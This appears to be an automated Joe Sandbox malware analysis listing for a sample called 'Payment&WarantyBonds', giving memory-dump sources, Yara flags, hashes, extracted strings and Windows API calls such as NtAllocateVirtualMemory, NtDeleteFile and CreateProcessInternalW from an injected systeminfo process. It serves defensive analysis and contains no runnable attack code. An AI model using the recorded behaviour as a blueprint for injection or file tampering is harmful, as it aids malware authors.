                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __aulldvrm
                                                                                                                                                                                • String ID: +$-$0$0
                                                                                                                                                                                • API String ID: 1302938615-699404926
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                • String ID: %%%u$[$]:%u
                                                                                                                                                                                • API String ID: 48624451-2819853543
                                                                                                                                                                                Strings
                                                                                                                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 018702E7
                                                                                                                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 018702BD
                                                                                                                                                                                • RTL: Re-Waiting, xrefs: 0187031E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                                • API String ID: 0-2474120054
                                                                                                                                                                                Strings
                                                                                                                                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01877B7F
                                                                                                                                                                                • RTL: Re-Waiting, xrefs: 01877BAC
                                                                                                                                                                                • RTL: Resource at %p, xrefs: 01877B8E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                • API String ID: 0-871070163
                                                                                                                                                                                APIs
                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0187728C
                                                                                                                                                                                Strings
                                                                                                                                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01877294
                                                                                                                                                                                • RTL: Re-Waiting, xrefs: 018772C1
                                                                                                                                                                                • RTL: Resource at %p, xrefs: 018772A3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                • API String ID: 885266447-605551621
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                • String ID: %%%u$]:%u
                                                                                                                                                                                • API String ID: 48624451-3050659472
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __aulldvrm
                                                                                                                                                                                • String ID: +$-
                                                                                                                                                                                • API String ID: 1302938615-2137968064
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: $$@
                                                                                                                                                                                • API String ID: 0-1194432280
                                                                                                                                                                                • Opcode ID: 4131ee8efcb70f487cc04537e144ed6668b03d6befa63f2ad3d17f1594e00690
                                                                                                                                                                                • Instruction ID: edfeba0cf8178264d4aefce5bf34fbe780d76d64a064d5afda95e1f3ea3a6657
                                                                                                                                                                                • Opcode Fuzzy Hash: 4131ee8efcb70f487cc04537e144ed6668b03d6befa63f2ad3d17f1594e00690
                                                                                                                                                                                • Instruction Fuzzy Hash: FD811C71D012699BDB768B58CC44BEAB7B9AB08714F0041DAEA1DF7281D7345F84CF61

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:2.5%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:4.3%
                                                                                                                                                                                Signature Coverage:2.3%
                                                                                                                                                                                Total number of Nodes:441
                                                                                                                                                                                Total number of Limit Nodes:76

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5b0000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 9$z$#'$'l$'y$GK$NW$~H$4$w
                                                                                                                                                                                • API String ID: 0-783608958
                                                                                                                                                                                • Opcode ID: 3ee51196ccf0d76963df58c81e92624905764aeecc10a67d2ef9a6bddbc44700
                                                                                                                                                                                • Instruction ID: 39fb00a4df7c269023d19fb29f5ebfc119c66d0b0e377a891b71d26bf3fb82ee
                                                                                                                                                                                • Opcode Fuzzy Hash: 3ee51196ccf0d76963df58c81e92624905764aeecc10a67d2ef9a6bddbc44700
                                                                                                                                                                                • Instruction Fuzzy Hash: 09E1C2B0D05269CFEB24CF98C8987EDBBB1FB44308F208599D009BB285C7B96985DF45
                                                                                                                                                                                APIs
                                                                                                                                                                                • FindFirstFileW.KERNELBASE(?,00000000), ref: 005CC5E4
                                                                                                                                                                                • FindNextFileW.KERNELBASE(?,00000010), ref: 005CC61F
                                                                                                                                                                                • FindClose.KERNELBASE(?), ref: 005CC62A
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5b0000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3541575487-0
                                                                                                                                                                                • Opcode ID: 347c652754719286c6943b3f92082ae1d2389480664ea2fdab00ad7d856c91d9
                                                                                                                                                                                • Instruction ID: 0eb3d5231a67a9dc40a902fdfbe0a5aede3b1d5969a63ee0a39812e51b5bdecc
                                                                                                                                                                                • Opcode Fuzzy Hash: 347c652754719286c6943b3f92082ae1d2389480664ea2fdab00ad7d856c91d9
                                                                                                                                                                                • Instruction Fuzzy Hash: 9D31A771A00309BFDB20DBA4CC45FFB7B7CBB84704F14449DF909A7181D670AA858BA4
                                                                                                                                                                                APIs
                                                                                                                                                                                • NtCreateFile.NTDLL(0000006F,2A4B6D90,?,?,?,?,?,?,?,?,?), ref: 005D90D8
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5b0000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                • Opcode ID: bb34955bba97853b7765a6d160fe001ce9d91580284fbb0d601ae2af88a1f003
                                                                                                                                                                                • Instruction ID: c590c36ae33e9adc2561fb50ff8571b2d5567f50763db5a157ec87d0ca30f678
                                                                                                                                                                                • Opcode Fuzzy Hash: bb34955bba97853b7765a6d160fe001ce9d91580284fbb0d601ae2af88a1f003
                                                                                                                                                                                • Instruction Fuzzy Hash: 4D31DA75A11209AFDB54DF99D881EEE7BB9FF8C310F00850AF918A7340D730A811CBA5
                                                                                                                                                                                APIs
                                                                                                                                                                                • NtReadFile.NTDLL(0000006F,2A4B6D90,?,?,?,?,?,?,?), ref: 005D9220
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5b0000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • NtAllocateVirtualMemory.NTDLL(005C1D1E,2A4B6D90,005D7F1E,00000000,00000004,00003000,?,?,?,?,?,005D7F1E,005C1D1E,005D7F1E,758B56EC,005C1D1E), ref: 005D9505
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5b0000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2167126740-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • NtDeleteFile.NTDLL(0000006F), ref: 005D92C3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5b0000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DeleteFile
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4033686569-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 005D9307
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5b0000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Close
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3535843008-0
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 51a5f42b0be175e2a5f784037a749c3440f9708c49c35ce3ef49548f0c8c7a88
                                                                                                                                                                                • Instruction ID: 0d3735f7d65dc6e98d03b9ad53c5aa630f461541cba4ea8af81d48d6765a7439
                                                                                                                                                                                • Opcode Fuzzy Hash: 51a5f42b0be175e2a5f784037a749c3440f9708c49c35ce3ef49548f0c8c7a88
                                                                                                                                                                                • Instruction Fuzzy Hash: 3690022130140003F150715854186064055DBE1306F56D021F0819574DD925D9566223
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • Sleep.KERNELBASE(000007D0), ref: 005D3ACB
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5b0000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                • String ID: net.dll$wininet.dll
                                                                                                                                                                                • API String ID: 3472027048-1269752229
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5b0000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeUninitialize
                                                                                                                                                                                • String ID: @J7<
                                                                                                                                                                                • API String ID: 3442037557-2016760708
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5b0000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeUninitialize
                                                                                                                                                                                • String ID: @J7<
                                                                                                                                                                                • API String ID: 3442037557-2016760708
                                                                                                                                                                                APIs
                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 005D968C
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5b0000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                                • String ID: D2\
                                                                                                                                                                                • API String ID: 3298025750-125810080
                                                                                                                                                                                APIs
                                                                                                                                                                                • RtlAllocateHeap.NTDLL(005C19D6,?,2V],005C19D6,005D55DE,005D5632,?,005C19D6,005D55DE,00001000,?,?,00000000), ref: 005D963F
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5b0000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                • String ID: 2V]
                                                                                                                                                                                • API String ID: 1279760036-563429239
                                                                                                                                                                                APIs
                                                                                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 005C4502
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5b0000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Load
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2234796835-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,005C824E,00000010,00000000,?,?,00000044,00000000,00000010,005C824E,?,?,00000000), ref: 005D9743
                                                                                                                                                                                Memory Dump Source
